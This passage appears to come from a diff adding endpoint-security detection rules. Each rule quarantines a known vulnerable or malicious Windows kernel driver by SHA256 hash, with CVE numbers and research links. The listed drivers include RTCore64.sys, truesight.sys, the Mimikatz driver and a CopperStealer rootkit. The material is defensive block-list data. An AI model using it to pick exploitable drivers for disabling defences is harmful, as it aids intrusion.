+ "creation_date": "2026-03-23T11:45:30.820032Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.820037Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2affa6b703f0491a44d6b7b09dfab83b36ac06979810665aaf7dd2913964c44d",
+ "comment": "Vulnerable Kernel Driver (aka nvoclock.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "092bf522-64cf-58d7-9ec6-21bd8a63ff22",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.454182Z",
+ "creation_date": "2026-03-23T11:45:30.454186Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.454195Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "75e539170a00e447842a85441be36dc9e1fa81a3f6386806f3d90e7b4cca1ac1",
+ "comment": "Vulnerable Kernel Driver (aka sandra.sys) [https://www.loldrivers.io/drivers/bc5e020a-ecff-43c8-b57b-ee17b5f65b21/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "093050fb-e014-5b6c-bc7a-eaec7e6d2bed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.459680Z",
+ "creation_date": "2026-03-23T11:45:30.459684Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.459692Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2096b460e31451659b0dde752264c362f47254c8191930bc921ff16a4311641",
+ "comment": "Vulnerable Kernel Driver (aka viragt.sys) [https://www.loldrivers.io/drivers/39742f99-2180-46d7-8538-56667c935cc3/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0937fde1-6c10-563d-8c36-b9fe95661faa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.605043Z",
+ "creation_date": "2026-03-23T11:45:29.605045Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.605051Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1a34c260e59a33c93b89417344f943a2d1dfb0006359a6fc946a41d0e9d36a55",
+ "comment": "Process Hacker driver (aka kprocesshacker.sys) [https://processhacker.sourceforge.io/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "094374ed-37c6-5e53-82f1-8197905cdc0d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.977261Z",
+ "creation_date": "2026-03-23T11:45:29.977263Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.977268Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fa9abb3e7e06f857be191a1e049dd37642ec41fb2520c105df2227fcac3de5d5",
+ "comment": "Malicious CopperStealer Rootkit (aka windbg.sys) [https://www.proofpoint.com/us/blog/threat-insight/now-you-see-it-now-you-dont-copperstealer-performs-widespread-theft] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0945e067-efd2-589b-b659-84177636ba9d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.615031Z",
+ "creation_date": "2026-03-23T11:45:29.615033Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.615038Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f088b2ba27dacd5c28f8ee428f1350dca4bc7c6606309c287c801b2e1da1a53d",
+ "comment": "MICRO-STAR vulnerable drivers (aka NBIOLib_X64.sys, NTIOLib_X64.sys, NTIOLib.sys and NBIOLib.sys) [CVE-2021-44899] [http://blog.rewolf.pl/blog/?p=1630] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0954e921-cad3-5e67-bbe4-f4eb3688a90c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.490102Z",
+ "creation_date": "2026-03-23T11:45:31.490104Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.490110Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6f3f1ffc8021b028288ce44c4f5cf948538587f3c8150de34c2685f487ce184c",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "098bf438-d172-56b8-bc7f-88b7a2bd2f52",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.828601Z",
+ "creation_date": "2026-03-23T11:45:31.828603Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.828608Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9337b3565c8221513bddfa2454c6657438b42231b0482a9fc7d8f16b0ecd25f6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0991e203-e53b-56b3-8788-ebd56ca7696e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.156921Z",
+ "creation_date": "2026-03-23T11:45:31.156923Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.156929Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "322d5a01c73af710e2ffabdb1622201b55025ea106b8c876ffc9b4bda156ff58",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "099233ba-9eb3-5001-a197-f2d85d26ec98",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.832549Z",
+ "creation_date": "2026-03-23T11:45:30.832551Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.832557Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "18bc25605b2b6fc7195a7606a7ca6a22002e5e6ce7b864e33b08256fa3cfc0f7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0998903c-fe2c-51af-9b1a-d6b598b200ce",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.970837Z",
+ "creation_date": "2026-03-23T11:45:29.970840Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.970848Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0713a541b70f58bbcd1807c69ae855e9ce041b807e34978df6c1e9357c53acef",
+ "comment": "Mimikatz kernel driver (aka mimidrv.sys) [https://github.com/gentilkiwi/mimikatz] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "099b45a0-daf7-5809-8286-0a614edf0f89",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.460379Z",
+ "creation_date": "2026-03-23T11:45:30.460382Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.460391Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0e10d3c73596e359462dc6bfcb886768486ff59e158f0f872d23c5e9a2f7c168",
+ "comment": "Vulnerable Kernel Driver (aka RTCore64.sys) [https://www.loldrivers.io/drivers/e32bc3da-4db1-4858-a62c-6fbe4db6afbd/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "09a0762e-2166-5697-845e-bef85c448ffc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.475769Z",
+ "creation_date": "2026-03-23T11:45:30.475772Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.475781Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2d32c28eb5945b85872697d7cfbe87813c09a0e1be28611563755f68b9cb88b",
+ "comment": "Malicious Kernel Driver (aka 6771b13a53b9c7449d4891e427735ea2.sys) [https://www.loldrivers.io/drivers/ddca6daf-4932-4e82-ad3c-d92d47632ea4/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "09a35e83-2f7a-509d-aaad-9a6dc1a143d5",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.143485Z",
+ "creation_date": "2026-03-23T11:45:32.143487Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.143493Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0cb429e6daaba89111d2edb3e01ef1d8ac9b90813b9d80292fe8050287a63146",
+ "comment": "Vulnerable Kernel Driver (aka wsdkd.sys) [https://www.loldrivers.io/drivers/a8f2da2a-369c-4b4d-9a00-d7a892b9f7c3/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "09a9b916-bd7b-5052-af92-0252a6b02915",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829324Z",
+ "creation_date": "2026-03-23T11:45:30.829326Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829331Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d4213c339e98d7f0f363dcfc282b8bac31c67870f7d877a6c7215dc2119660fa",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "09b0c853-85bf-54cd-a518-6abb579425f4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.621564Z",
+ "creation_date": "2026-03-23T11:45:29.621566Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.621571Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7e3b0b8d3e430074109d85729201d7c34bc5b918c0bcb9f64ce88c5e37e1a456",
+ "comment": "ASUSTeK GPU vulnerable physmem driver (aka AsIO2_64.sys) [https://syscall.eu/blog/2020/03/30/asus_gio/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "09c2585e-54b7-5a6d-9c74-43e356a1f07d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.491007Z",
+ "creation_date": "2026-03-23T11:45:31.491010Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.491018Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "afa9b3a1cb40dce9b9b524a72376159f9defcb47f29330afccec9bfb616227d8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "09d1c951-b169-5cb7-b910-d7dda62c52fd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.608579Z",
+ "creation_date": "2026-03-23T11:45:29.608581Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.608586Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f6b082a294c1a85bf69a3f4a7e20536291372b53569bd562f1008eb5cf7228cd",
+ "comment": "VirtualBox VBoxDrv vulnerable driver (aka VBoxDrv.sys) [CVE-2008-3431] [https://www.loldrivers.io/drivers/79542852-3a0c-43bc-bfa3-3eeb0e1d7fd2/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "09dc31e7-127d-586f-a47d-53c043066582",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.146222Z",
+ "creation_date": "2026-03-23T11:45:31.146224Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.146229Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "febbb87b9c9081515f8b70e7bbd1f22ea0ec89f5cf5e2f0dc2e129fa48126130",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "09f49d45-0a9c-509f-a709-1a9f3e9d96ef",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.154840Z",
+ "creation_date": "2026-03-23T11:45:31.154842Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.154847Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d6607075c558ba471c6678c1bca63a601cfc8319f6ed99d21fefe37467670097",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "09f60b6a-f763-592b-afee-9c74aa2881fa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.495904Z",
+ "creation_date": "2026-03-23T11:45:31.495906Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.495911Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2ce9c1e9b1126e80b0aa0705ee7ab85052b9397601ad7f9c1c83dff3819caeff",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a0dc9c4-e3f7-5852-898a-c7b6d202e4a3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617971Z",
+ "creation_date": "2026-03-23T11:45:29.617973Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617979Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "20dd9542d30174585f2623642c7fbbda84e2347e4365e804e3f3d81f530c4ece",
+ "comment": "NVIDIA vulnerable flash tool (aka nvflash.sys nd nvflsh64.sys) [CVE-2019-5688] [https://learn.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-driver-block-rules] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "0a1a2d59-132b-5c6b-824f-139e92303293",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.611584Z",
+ "creation_date": "2026-03-23T11:45:29.611586Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.611591Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "66cc007348a41fb33fab59f5ea265006534ba82db4eb7327039cbe2b4ce7e077",
